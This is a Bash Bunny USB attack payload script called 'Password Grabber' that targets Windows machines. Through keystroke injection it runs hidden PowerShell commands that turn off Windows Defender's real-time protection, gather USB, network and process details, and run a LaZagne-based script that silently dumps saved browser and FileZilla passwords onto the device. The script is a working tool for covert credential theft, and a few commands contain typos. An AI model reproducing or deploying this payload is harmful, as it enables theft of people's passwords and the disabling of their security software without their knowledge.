#!/bin/bash
#
# Title:         Password Grabber
# Description:   Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 
#                This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. 
#                This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
# Author:        jdebetaz
# Props:         Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
# Version:       1.1
# Category:      Credentials
# Target:        Windows
# Attackmodes:   HID, STORAGE

# Options
LOOTDIR=/root/udisk/loot/PasswordGrabber

####remove windows defender#####

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION

######## HID STAGE ########
ATTACKMODE HID STORAGE

######## MAKE LOOT AND FOLDERS DIRECTORY ########
# Setup named logs in loot directory
mkdir -p $LOOTDIR
mkdir -p /root/udisk/loot/ProcessInfo
mkdir -p /root/udisk/loot/USB
mkdir -p /root/udisk/loot/NetworkInfo
mdkir -p /root/udisk/loot/EventandBrowserHistory

######## ATTACK ########
LED ATTACK

LED B
##disable windows defender###
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((Set-MpPreference -DisableRealtimeMonitoring $true))"
sleep 1

LED Y
###get USB info ###
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\* |Select FriendlyName|Out-File -FilePath D:\loot\USB\usbinfo.txt))"
sleep 1

LED R TRIPLE
###get network info###
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((Get-NetIPAddress -AddressState Preferred -AddressFamily IPv4 | Select-Object IPAddress,InterfaceAlias|Out-File -FilePath D:\loot\NetworkInfo\network.txt))"
sleep 1

LED C QUIN
###Laptop Info###
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
sleep 15

#LED M QUIN
###Wait until History are grabbed###
#RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi #win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION#\executeHistory.ps1')"
#sleep 8

LED W QUIN
###Wait until passwords are grabbed###
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
sleep 8

LED Y TRIPLE
######## GET PROCESS INFORMATION ########
QUACK DELAY 6000
QUACK GUI r
QUACK STRING "powershell -NoP -NonI -W Hidden"
QUACK ENTER
QUCK DELAY 1000
QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit"
QUACK ENTER
LED Y G B 100
sleep 3

# Sync File System
LED C 100
sync; sleep 1; sync


######## FINISH ########
LED FINISH